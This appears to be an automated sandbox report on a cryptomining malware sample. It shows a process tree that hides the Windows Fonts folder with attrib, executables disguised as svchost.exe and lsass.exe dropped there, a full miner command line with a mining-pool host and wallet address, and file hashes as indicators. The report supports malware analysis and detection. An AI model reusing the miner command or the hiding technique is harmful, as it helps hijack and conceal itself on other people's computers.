[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
[depth 3] C:\Windows\SysWOW64\cmd.exe -> cmd /c attrib +s +a %SystemRoot%\Fonts
[depth 4] C:\Windows\SysWOW64\attrib.exe -> attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
- \??\c:\windows\Fonts\svchost.exe (depth 1): c:\windows\Fonts\svchost.exe
  - Executes dropped EXE
- \??\c:\windows\Fonts\KvMonXP.exe (depth 2): "KvMonXP.exe" -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash
  - Detected Stratum cryptominer command
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\tem.vbs
  Filesize: 275B
  MD5: 4840e58034b78f4d0fa798ac2ffd1d49
  SHA1: 6616183e04694bd6680889d897cc4fbc61af0dfc
  SHA256: 97060f6ba35b625b60435fa18f91b755f36d03d8c9140f3ddf24e25bc830f0d9
  SHA512: fdaec74527bd31d52b489a9ad01826d87d58abfa9575c446a14362b3cd5efad57357ddf539ff98840bd9532e20eb0aef5e0fdf8f8319695ab6591337863d513c
- C:\Windows\Fonts\KvMonXP.exe
  Filesize: 775KB
  MD5: 8a8045c0472e3e90257d51a236ff62dd
  SHA1: 2d9cfd9bfe69e7daf9a695df48467d20904157d6
  SHA256: d92cfffbd3060aa141eab23a8792aa05a0494a6323f92d10d457a8f89eab62c2
  SHA512: 1d65f219dad3fa0762019565300430234e690c8b4b74a941dd82785c75fd70945b1db94684af7aa0238f5d76b4c6ff0195d4f94ad34818868f86f01c1cbe4068
- C:\Windows\Fonts\lsass.exe
  Filesize: 1.4MB
  MD5: ec0bc41f1e623de85d1be23c55cc5dd8
  SHA1: d1912bc5d7180b89af68fc7996a943df90b4106a
  SHA256: 0b7585b424e77d63186607a4b1e81d65849ce62e3bd6efd52f2b822378549981
  SHA512: ea7aaf463a9fc6d28d116516f7c1f36c814f50dcd35779ae8b897155ef6c17dec25b4a2a0a05a8a518e32f2632fda8821c080b8fe2e27ee7613dcff07c15ed8e
- C:\Windows\Fonts\svchost.exe
  Filesize: 87KB
  MD5: f3562c44fc322b78460772ec663b5d78
  SHA1: cf5816f1a80a61b5a890232235441b424ab8ffff
  SHA256: 50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
  SHA512: cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
- \??\c:\windows\Fonts\KvMonXP.exe
  Filesize: 775KB
  MD5: 8a8045c0472e3e90257d51a236ff62dd
  SHA1: 2d9cfd9bfe69e7daf9a695df48467d20904157d6
  SHA256: d92cfffbd3060aa141eab23a8792aa05a0494a6323f92d10d457a8f89eab62c2
  SHA512: 1d65f219dad3fa0762019565300430234e690c8b4b74a941dd82785c75fd70945b1db94684af7aa0238f5d76b4c6ff0195d4f94ad34818868f86f01c1cbe4068
- \??\c:\windows\Fonts\lsass.exe
  Filesize: 1.4MB
  MD5: ec0bc41f1e623de85d1be23c55cc5dd8
  SHA1: d1912bc5d7180b89af68fc7996a943df90b4106a
  SHA256: 0b7585b424e77d63186607a4b1e81d65849ce62e3bd6efd52f2b822378549981
  SHA512: ea7aaf463a9fc6d28d116516f7c1f36c814f50dcd35779ae8b897155ef6c17dec25b4a2a0a05a8a518e32f2632fda8821c080b8fe2e27ee7613dcff07c15ed8e
- \??\c:\windows\Fonts\svchost.exe
  Filesize: 87KB
  MD5: f3562c44fc322b78460772ec663b5d78
  SHA1: cf5816f1a80a61b5a890232235441b424ab8ffff
  SHA256: 50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
  SHA512: cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
- \??\c:\windows\hosts.bat
  Filesize: 4KB
  MD5: 9459b1d319aab5c7773a1b24e3a25346
  SHA1: efbd37a1b9fe93aa8b0ae23dba0999fc5437447c
  SHA256: c21313ed87306ff6d0db8c0ef18fd89607fb068dcd4a82dcbd580b772dfe0663
  SHA512: 609988a8eb4d64951f5ea60083faf6fb4ac3063f6bfce780cab832c59219433bcd231262c4d4bcf7dac8e3860b2189ae71607dd1377bf98b65f75d1dcbc359e3
- \??\c:\windows\hosts1.bat
  Filesize: 4KB
  MD5: a98a5e1a59b4b05a4769924dfa541c53
  SHA1: f5e4fe1c2959ca656fe76547bc600aedace2e02e
  SHA256: cc5ec7687541b94eb3d3ebf025b07006aec46763f01c4428c30232bea51f562c
  SHA512: 189cf76f85a2178e8e58a15bf8e7f7668dc07e77da04e068a3fbc59acad59136fec8bf7caccb247659a5d6d44738e829e1d439d7dedd18659bc9f08ddb5874f0